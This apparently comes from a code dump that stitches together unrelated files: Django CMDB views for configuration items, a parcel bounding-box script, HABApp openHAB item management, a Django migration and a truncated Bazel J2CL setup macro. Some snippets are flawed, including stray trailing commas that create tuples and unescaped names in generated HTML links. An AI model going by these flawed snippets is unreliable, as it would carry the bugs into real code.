return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) self.calculate_relations(ci_id) return super(CIRelationsEdit, self).get(*args, **kwargs) def calculate_relations(self, ci_id): self.relations_contains = [ (x, x.child, get_icon_for(x.child)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.CONTAINS.id) ] self.relations_parts = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.CONTAINS.id) ] self.relations_requires = [ (x, x.child, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.REQUIRES.id) ] self.relations_isrequired = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.REQUIRES.id) ] self.relations_hasrole = [ (x, x.child, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.HASROLE.id) ] self.relations_isrole = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.HASROLE.id) ] class CIRelationsView(CIRelationsEdit): def get_context_data(self, **kwargs): ret = super(CIRelationsView, self).get_context_data(**kwargs) ret = _update_labels(ret, self.ci) ret.update({ 'editable': False, }) return ret class CIGitEdit(BaseCIDetails): template_name = 'cmdb/ci_git.html' active_tab = 'git' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_git_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIGitEdit, self).initialize_vars() self.git_changes = [] def get_context_data(self, **kwargs): ret = super(CIGitEdit, self).get_context_data(**kwargs) ret.update({ 'label': 'Edit CI: {} (uid: {})'.format(self.ci.name, self.ci.uid), 'subsection': 'Edit - %s' % self.ci.name, 'git_changes': self.git_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. 
return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.CONF_GIT.id, ) paginator = Paginator(query, 20) self.git_changes = paginator.page(page) object_list = [] for item in self.git_changes.object_list: object_list.append(item.content_object) self.git_changes.object_list = object_list return super(CIGitEdit, self).get(*args, **kwargs) class CIGitView(CIGitEdit): def get_context_data(self, **kwargs): ret = super(CIGitView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIPuppetEdit(BaseCIDetails): template_name = 'cmdb/ci_puppet.html' active_tab = 'puppet' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_puppet_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIPuppetEdit, self).initialize_vars() self.puppet_reports = [] def get_context_data(self, **kwargs): ret = super(CIPuppetEdit, self).get_context_data(**kwargs) ret.update({ 'puppet_reports': self.puppet_reports, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChangePuppet.objects.filter(ci=self.ci).all() paginator = Paginator(query, 10) self.puppet_reports = paginator.page(page) object_list = [] for report in self.puppet_reports.object_list: puppet_logs = db.PuppetLog.objects.filter( cichange=report ).all() object_list.append( dict(report=report, logs=puppet_logs) ) self.puppet_reports.object_list = object_list return super(CIPuppetEdit, self).get(*args, **kwargs) class CIPuppetView(CIPuppetEdit): def get_context_data(self, **kwargs): ret = super(CIPuppetView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIRalphEdit(BaseCIDetails): template_name = 'cmdb/ci_ralph.html' active_tab = 'ralph' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIRalphEdit, self).initialize_vars() self.device_attributes_changes = [] def get_context_data(self, **kwargs): ret = super(CIRalphEdit, self).get_context_data(**kwargs) ret.update({ 'device_attributes_changes': self.device_attributes_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. 
return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.DEVICE.id, ) paginator = Paginator(query, 20) self.device_attributes_changes = paginator.page(page) object_list = [] for item in self.device_attributes_changes.object_list: object_list.append(item.content_object) self.device_attributes_changes.object_list = object_list return super(CIRalphEdit, self).get(*args, **kwargs) class CIRalphView(CIRalphEdit): def get_context_data(self, **kwargs): ret = super(CIRalphView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIChangesEdit(BaseCIDetails): template_name = 'cmdb/ci_changes.html' active_tab = 'ci_changes' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIChangesEdit, self).initialize_vars() self.ci_attributes_changes = [] def get_context_data(self, **kwargs): ret = super(CIChangesEdit, self).get_context_data(**kwargs) ret.update({ 'ci_attributes_changes': self.ci_attributes_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.CI.id, ).order_by('time') paginator = Paginator(query, 20) self.ci_attributes_changes = paginator.page(page) object_list = [] for item in self.ci_attributes_changes.object_list: object_list.append(item.content_object) self.ci_attributes_changes.object_list = object_list return super(CIChangesEdit, self).get(*args, **kwargs) class CIChangesView(CIChangesEdit): def get_context_data(self, **kwargs): ret = super(CIChangesView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIZabbixEdit(BaseCIDetails): template_name = 'cmdb/ci_zabbix.html' active_tab = 'zabbix' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIZabbixEdit, self).initialize_vars() self.zabbix_triggers = [] def get_context_data(self, **kwargs): ret = super(CIZabbixEdit, self).get_context_data(**kwargs) ret.update({ 'zabbix_triggers': self.zabbix_triggers, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. 
return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChangeZabbixTrigger.objects.filter( ci=self.ci, ).order_by('-lastchange') paginator = Paginator(query, 20) self.zabbix_triggers = paginator.page(page) return super(CIZabbixEdit, self).get(*args, **kwargs) class CIZabbixView(CIZabbixEdit): def get_context_data(self, **kwargs): ret = super(CIZabbixView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIProblemsEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'problems' sort_variable_name = 'sort' export_variable_name = None # fix in bob! columns = table_colums() perms = [ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(CIProblemsEdit, self).initialize_vars() self.problems = [] def get_context_data(self, *args, **kwargs): ret = super(CIProblemsEdit, self).get_context_data(**kwargs) ret.update( super(CIProblemsEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.CIProblem, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(CIProblemsEdit, self).get(*args, **kwargs) class CIProblemsView(CIProblemsEdit): def get_context_data(self, **kwargs): ret = super(CIProblemsView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class JiraChangesEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'jira_changes' sort_variable_name = 'sort' export_variable_name = None # fix in bob! 
columns = table_colums() perms = [ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(JiraChangesEdit, self).initialize_vars() self.jira_changes = [] def get_context_data(self, *args, **kwargs): ret = super(JiraChangesEdit, self).get_context_data(**kwargs) ret.update( super(JiraChangesEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.JiraChanges, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(JiraChangesEdit, self).get(*args, **kwargs) class JiraChangesView(JiraChangesEdit): def get_context_data(self, **kwargs): ret = super(JiraChangesView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIIncidentsEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'incidents' sort_variable_name = 'sort' export_variable_name = None # fix in bob! columns = table_colums() perms = [ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(CIIncidentsEdit, self).initialize_vars() self.incidents = [] def get_context_data(self, *args, **kwargs): ret = super(CIIncidentsEdit, self).get_context_data(**kwargs) ret.update( super(CIIncidentsEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.CIIncident, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(CIIncidentsEdit, self).get(*args, **kwargs) class CIIncidentsView(CIIncidentsEdit): def get_context_data(self, **kwargs): ret = super(CIIncidentsView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class Search(BaseCMDBView): template_name = 'cmdb/search_ci.html' Form = CISearchForm cis = [] def get_context_data(self, **kwargs): subsection = '' layer = self.request.GET.get('layer') type = self.request.GET.get('type') if layer: subsection += '%s - ' % CILayer.objects.get(id=layer) elif type: type = CIType.objects.get(pk=type) subsection += '%s - ' % type.name subsection += 'Search' if layer is None: sidebar_selected = 'all-cis' else: select = CILayer.objects.get(id=layer) sidebar_selected = slugify(select.name) ret = super(Search, self).get_context_data(**kwargs) ret.update({ 'table_header': self.table_header, 'table_body': self.table_body, 'page': self.page, 'pages': _get_pages(self.paginator, 
self.page_number), 'sort': self.request.GET.get('sort', ''), 'layer': self.request.GET.get('layer', ''), 'form': self.form, 'sidebar_selected': sidebar_selected, 'subsection': subsection, }) return ret def form_initial(self, values): return values def get_table_header(self, layer, type_): DEFAULT_COLS = ( {'label': 'Type', 'name': 'type', 'sortable': 1}, {'label': 'Layer', 'name': 'layers', 'sortable': 1}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) table_header = ( {'label': 'Name', 'name': 'name', 'sortable': 1}, {'label': 'CI UID', 'name': 'uid', 'sortable': 1}, ) if type_ == 0: table_header += DEFAULT_COLS elif type_ == CI_TYPES.APPLICATION.id: table_header += ( {'label': 'Type', 'name': 'type'}, {'label': 'Layer', 'name': 'layers', 'sortable': 1}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) elif type_ == CI_TYPES.DEVICE.id: table_header += ( {'label': 'Parent Device', 'name': 'Parent Device'}, {'label': 'Network', 'name': 'Network'}, {'label': 'DC', 'name': 'DC'}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) elif type_ == CI_TYPES.PROCEDURE.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.VENTURE.id: table_header += ( {'label': 'Parent venture', 'name': 'Parent venture'}, {'label': 'Child Ventures', 'name': 'Child Ventures'}, {'label': 'Service', 'name': 'Service'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, {'label': 'Business Owner', 'name': 'Business Owner'}, ) elif type_ == CI_TYPES.VENTUREROLE.id: table_header += ( {'label': 'Parent venture', 'name': 'Parent venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, ) elif type_ == CI_TYPES.BUSINESSLINE.id: table_header += ({ 'label': 'Services contained', 'name': 'Services contained', },) elif type_ == CI_TYPES.SERVICE.id: table_header += ( {'label': 'Contained Venture', 'name': 'Contained Venture'}, {'label': 'Business Line', 'name': 'Business Line'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, {'label': 'Business Owner', 'name': 'Business Owner'}, ) elif type_ == CI_TYPES.NETWORK.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.DATACENTER.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.NETWORKTERMINATOR.id: table_header += DEFAULT_COLS table_header += ({'label': 'Operations', 'name': 'Operations'},) return table_header def get_name(self, i, icon): return mark_safe( '<a href="./ci/view/%s"> <i class="fugue-icon %s"></i> %s</a>' % (escape(i.id), escape(icon), escape(i.name)) ) def get_uid(self, i): return mark_safe('<a href="./ci/view/%s">%s</a>' % ( escape(i.id), escape(i.uid))) def get_layer(self, i): return ', '.join(unicode(x) for x in i.layers.select_related()) def get_parent_dev(self, i): parent = '-' try: parent = i.content_object.parent except AttributeError: pass return parent def get_network(self, i): network = '-' try: networks = i.content_object.ipaddress_set.all() network = ', '.join(unicode(x) for x in networks) except AttributeError: pass return network def get_dc(self, i): dc = '-' try: dc = i.content_object.dc except AttributeError: pass return dc def get_owners(self, i, filter): owners = ', '.join( "%s %s" % (b.owner.first_name, b.owner.last_name) for b in i.ciownership_set.filter(type=filter) ), return owners[0] def 
get_bl(self, i, relations): business_line = '-' rel_bl = relations.filter( child=i.id, parent__type__id=CI_TYPES.BUSINESSLINE.id ) for bl in rel_bl: business_line = ('<a href="%s">%s</a>' % ( escape(bl.parent.id), escape(bl.parent.name)) ) return mark_safe(business_line) def get_venture(self, relations, i, child=False): venture = [] if child is False: ven = relations.filter( child=i.id, parent__type__id=CI_TYPES.VENTURE.id ) for v in ven: venture.append( '<a href="/cmdb/ci/view/%s">%s</a>' % ( escape(v.parent.id), escape(v.parent.name)) ) elif child is True: ven = relations.filter( parent=i.id, child__type__id=CI_TYPES.VENTURE.id ) for v in ven: venture.append( '<a href="/cmdb/ci/view/%s">%s</a>' % ( escape(v.child.id), escape(v.child.name)) ) return mark_safe(', '.join(x for x in venture)) def get_service(self, relations, i): services = '' servi = relations.filter( parent=i.id, child__type__id=CI_TYPES.SERVICE.id ) for s in servi: services += '%s, ' % escape(s.child.name) return mark_safe(services) def get_operations(self, i): return mark_safe( '<a href="./ci/edit/%s">Edit</a> | ' '<a href="./ci/view/%s">View</a>', ) % (escape(i.id), escape(i.id)) def get_table_body(self, cis, type_): """Return data for table body.""" table_body = [] relations = CIRelation.objects.all() t_owners = 1 b_owners = 2 for i in cis: icon = get_icon_for(i) venture = self.get_venture(relations, i) service = self.get_service(relations, i) DEFAULT_ROWS = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'type', 'value': i.type.name}, {'name': 'layer', 'value': self.get_layer(i)}, {'name': 'layer', 'value': venture}, {'name': 'service', 'value': service}, {'name': 'pci_scope', 'value': i.pci_scope}, {'name': 'operations', 'value': self.get_operations(i)} ] if type_ is None: table_body.append(DEFAULT_ROWS) elif type_ == CI_TYPES.APPLICATION: table_body.append(DEFAULT_ROWS) elif type_ == CI_TYPES.DEVICE: row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'parent-dev', 'value': self.get_parent_dev(i)}, {'name': 'network', 'value': self.get_network(i)}, {'name': 'dc', 'value': self.get_dc(i)}, {'name': 'venture', 'value': venture}, {'name': 'service', 'value': service}, {'name': 'pci_scope', 'value': i.pci_scope}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.VENTURE: venture_c = self.get_venture(relations, i, child=True) b_own = self.get_owners(i, b_owners) t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': venture}, {'name': 'venture-child', 'value': venture_c}, {'name': 'service', 'value': service}, {'name': 't_owners', 'value': t_own}, {'name': 'b_owners', 'value': b_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.VENTUREROLE: t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': venture}, {'name': 'service', 'value': service}, {'name': 't_owners', 'value': t_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.BUSINESSLINE: ven = relations.filter(parent=i.id) services_contained = ', '.join( '<a href="/cmdb/ci/view/%s">%s</a>' % (v.child.id, v.child.name) for v in ven) row = [ {'name': 'name', 'value': 
self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': services_contained}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.SERVICE.id: venture_c = self.get_venture(relations, i, child=True) b_own = self.get_owners(i, b_owners) t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture-child', 'value': venture_c}, {'name': 'bl', 'value': self.get_bl(i, relations)}, {'name': 't_owners', 'value': t_own}, {'name': 'b_owners', 'value': b_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) else: table_body.append(DEFAULT_ROWS) return table_body def get(self, *args, **kwargs): values = self.request.GET cis = db.CI.objects.all() uid = values.get('uid') state = values.get('state') status = values.get('status') type_ = int(values.get('type', 0) or 0) layer = values.get('layer') parent_id = int(values.get('parent', 0) or 0) if values: if uid: cis = cis.filter(Q(name__icontains=uid) | Q(uid=uid)) if state: cis = cis.filter(state=state) if status: cis = cis.filter(status=status) if type_: cis = cis.filter(type=type_) if layer: cis = cis.filter(layers=layer) if parent_id: cis = cis.filter(child__parent__id=parent_id) sort = self.request.GET.get('sort', 'name') if sort: cis = cis.order_by(sort) if values.get('top_level'): cis = cis.filter(child__parent=None) page = self.request.GET.get('page') or 1 self.page_number = int(page) self.paginator = Paginator(cis, ROWS_PER_PAGE) try: cis = self.paginator.page(page) except PageNotAnInteger: cis = self.paginator.page(1) page = 1 except EmptyPage: cis = self.paginator.page(self.paginator.num_pages) page = self.paginator.num_pages self.page = cis self.table_header = self.get_table_header(layer, type_) self.table_body = self.get_table_body(cis, type_), form_options = dict( label_suffix='', initial=self.form_initial(values), ) self.form = self.Form(**form_options) return super(Search, self).get(*args, **kwargs) class Index(BaseCMDBView): template_name = 'cmdb/index.html' def get_context_data(self, **kwargs): ret = super(Index, self).get_context_data(**kwargs) return ret class ViewUnknown(BaseCMDBView): template_name = 'cmdb/view_ci_error.html' def get_context_data(self, **kwargs): ret = super(ViewUnknown, self).get_context_data(**kwargs) ret.update({ 'error_message': 'This Configuration Item cannot be found in the CMDB.'}) return ret class Graphs(BaseCMDBView): template_name = 'cmdb/graphs.html' rows = [] graph_data = {} def get_context_data(self, *args, **kwargs): ret = super(Graphs, self).get_context_data(**kwargs) form = SearchImpactForm(initial=self.get_initial()) ret.update(dict( form=form, rows=self.rows, graph_data=self.graph_data, )) return ret def get_initial(self): return dict( ci=self.request.GET.get('ci'), ) def get(self, *args, **kwargs): MAX_RELATIONS_COUNT = 1000 ci_id = self.request.GET.get('ci') self.rows = [] ci_names = {} if ci_id: ic = ImpactCalculator(root_ci=CI.objects.get(pk=int(ci_id))) search_tree, pre = ic.find_affected_nodes(int(ci_id)) affected_cis = CI.objects.select_related( 'content_type', 'type').filter(pk__in=pre) nodes = [( ci.id, ci.name, get_icon_for(ci)) for ci in affected_cis ] if len(search_tree) > MAX_RELATIONS_COUNT: # in case of large relations count, skip generating json data # for chart purposes self.graph_data = simplejson.dumps( {'overflow': len(search_tree)} ) else: ci_names = 
dict(CI.objects.values_list('id', 'name')) relations = [dict( child=item, parent=search_tree.get(item), parent_name=ci_names[item], type=ic.graph.edge_attributes( (search_tree.get(item), item) )[0], child_name=ci_names[search_tree.get(item)]) for item in search_tree.keys() if item and search_tree.get(item) ] self.graph_data = simplejson.dumps(dict( nodes=nodes, relations=relations, )) for ci in affected_cis: co = ci.content_object self.rows.append(dict( icon=get_icon_for(ci), ci=ci, venture=getattr(co, 'venture', ''), role=getattr(co, 'role', ''), )) return super(BaseCMDBView, self).get(*args, **kwargs) class Cleanup(Search): """The view containing various data useful for clean up tasks.""" template_name = 'cmdb/cleanup.html' def get_context_data(self, *args, **kwargs): ret = super(Cleanup, self).get_context_data() ret['duplicates'] = CI.get_duplicate_names() ret['header'] = self.get_table_header(None, 0) orphans = CI.objects.filter(parent=None, child=None) ret['orphans_table'] = [self.get_table_body(orphans, None)] return ret <reponame>fintelia/habitationi # Copyright 2019 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import fiona import shapely.geometry import csv parcels = fiona.open("ASSESSING_ParcelsFY2019.shp") done = 0 w = csv.writer(open("parcelbbox.csv", "w"), "excel-tab") for parcel in parcels: lot = shapely.geometry.shape(parcel['geometry']) lot = lot.buffer(100) w.writerow([parcel['properties']['ML'], ",".join(map(lambda x: "%i" % x, lot.bounds))]) from typing import Set, Dict import HABApp from HABApp.openhab.connection_handler.func_async import async_set_habapp_metadata, async_create_item, \ async_remove_item, async_create_channel_link, async_get_items, \ async_remove_channel_link, async_remove_metadata, async_set_metadata, async_get_item_with_habapp_meta from HABApp.openhab.definitions.rest.habapp_data import HABAppThingPluginData, load_habapp_meta from ._log import log_item as log from .cfg_validator import UserItem def _filter_items(i): if not i.get('editable', False): return False if 'HABApp' not in i.setdefault('metadata', {}): return False load_habapp_meta(i) if not isinstance(i['metadata']['HABApp'], HABAppThingPluginData): return False return True async def cleanup_items(keep_items: Set[str]): all_items = await async_get_items(include_habapp_meta=True) to_delete: Dict[str, HABAppThingPluginData] = {} for cfg in filter(_filter_items, all_items): name = cfg['name'] if name not in keep_items: to_delete[name] = cfg['metadata']['HABApp'] if not to_delete: return None for item, data in to_delete.items(): assert isinstance(data, HABAppThingPluginData) await _remove_item(item, data) async def _remove_item(item: str, data: HABAppThingPluginData): # remove created link if data.created_link is not None: log.debug(f'Removing link from {data.created_link} to {item}') await async_remove_channel_link(data.created_link, item) # remove created metadata for ns in data.created_ns: log.debug(f'Removing metadata {ns} from {item}') await async_remove_metadata(item, ns) # finally remove the item 
log.info(f'Removing item {item}') await async_remove_item(item) async def create_item(item: UserItem, test: bool) -> bool: if test: _txt = str(item) if _txt.startswith('UserItem'): _txt = _txt[4:] log.info(f'Would create {_txt}') return False name = item.name try: existing_ok = True existing_item = await async_get_item_with_habapp_meta(name) habapp_data = existing_item['metadata']['HABApp'] # we only modify items we created if not isinstance(habapp_data, HABAppThingPluginData): log.warning(f'Skipping item {name} because it does already exist and was not created by the plugin!') return False # check if the item properties are already correct for k, v in item.get_oh_cfg().items(): if v != existing_item.get(k, ''): existing_ok = False except HABApp.openhab.exceptions.ItemNotFoundError: existing_ok = True existing_item = None habapp_data = HABAppThingPluginData() # Update/Create item definition if existing_item is None or not existing_ok: log.info(f'{"Creating" if existing_item is None else "Updating"} item: {item.type} {name} "{item.label}"') tmp = item.get_oh_cfg() tmp['item_type'] = tmp.pop('type') if not await async_create_item(**tmp): log.error(f'Item operation failed for {tmp}!') return False await async_set_habapp_metadata(name, habapp_data) else: log.debug(f'Item {name} is already correct!') # check create link if item.link != habapp_data.created_link: # remove existing if habapp_data.created_link: log.debug(f'Removing link from {habapp_data.created_link} to {name}') await async_remove_channel_link(habapp_data.created_link, name) # create new link log.debug(f'Creating link from {item.link} to {item.name}') if not await async_create_channel_link(item.link, name): log.error(f'Creating link from {item.link} to {name} failed!') await _remove_item(name, habapp_data) return False # save that we created a link habapp_data.created_link = item.link await async_set_habapp_metadata(name, habapp_data) else: log.debug(f'Link to {name} is already correct') # check create metadata if item.metadata or habapp_data.created_ns: # remove obsolete for ns in set(habapp_data.created_ns) - set(item.metadata.keys()): log.debug(f'Removing metadata {ns} from {name}') await async_remove_metadata(name, ns) # create new for ns, meta_cfg in item.metadata.items(): m_val = meta_cfg['value'] m_config = meta_cfg['config'] log.debug(f'Adding metadata {ns} to {name}: {m_val} {m_config}') if await async_set_metadata(name, ns, m_val, m_config): habapp_data.created_ns.append(ns) else: log.error(f'Creating metadata for {name} failed!') await _remove_item(name, habapp_data) return False # save that we created metadata habapp_data.created_ns = list(item.metadata.keys()) await async_set_habapp_metadata(name, habapp_data) return True <reponame>buketkonuk/pythondotorg # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import events.models class Migration(migrations.Migration): dependencies = [ ('events', '0003_auto_20150416_1853'), ] operations = [ migrations.AddField( model_name='recurringrule', name='duration_internal', field=models.DurationField(default=events.models.duration_default), ), migrations.AlterField( model_name='recurringrule', name='duration', field=models.CharField(default='15 min', max_length=50), ), ] <reponame>pomponchik/computor_v2 from srcs.ast.nodes.branches.abstract_branche_node import AbstractBrancheNode class QuestionNode(AbstractBrancheNode): name = '3' class MissingShaderUniformError(ValueError): pass """Macro to use for loading the J2CL repository""" 
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_jar") load("@io_bazel_rules_closure//closure:defs.bzl", "closure_repositories") def setup_j2cl_workspace(): """Load all dependencies needed for J2CL.""" closure_repositories( omit_com_google_protobuf = True, omit_com_google_auto_common = True, ) native.maven_jar( name = "com_google_auto_common", artifact = "com.google.auto:auto-common:0.9", ) native.maven_jar( name = "com_google_auto_service", artifact = "com.google.auto.service:auto-service:1.0-rc2", ) # We cannot replace com_google_jsinterop_annotations so choose a different name native.maven_jar( name = "com_google_jsinterop_annotations_head", artifact = "com.google.jsinterop:jsinterop-annotations:HEAD-SNAPSHOT", repository = "https://oss.sonatype.org/content/repositories/google-snapshots/", ) native.maven_jar( name = "org_apache_commons_collections", artifact = "commons-collections:commons-collections:3.2.2", ) native.maven_jar( name = "org_apache_commons_lang2", artifact = "commons-lang:commons-lang:2.6", ) native.maven_jar( name = "org_apache_commons_lang3", artifact = "org.apache.commons:commons-lang3:3.6", ) native.maven_jar( name = "org_apache_commons_text", artifact = "org.apache.commons:commons-text:1.2", ) native.maven_jar( name = "org_apache_velocity", artifact = "org.apache.velocity:velocity:1.7", ) native.maven_jar( name = "org_junit", artifact = "junit:junit:4.12", ) native.maven_jar( name = "com_google_testing_compile", artifact = "com.google.testing.compile:compile-testing:0.15", ) native.maven_jar( name = "org_mockito", artifact = "org.mockito:mockito-all:1.9.5", ) native.maven_jar( name = "com_google_truth", artifact = "com.google.truth:truth:0.39", ) # Eclipse JARs listed at # http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/ http_jar( name = "org_eclipse_jdt_content_type", url = 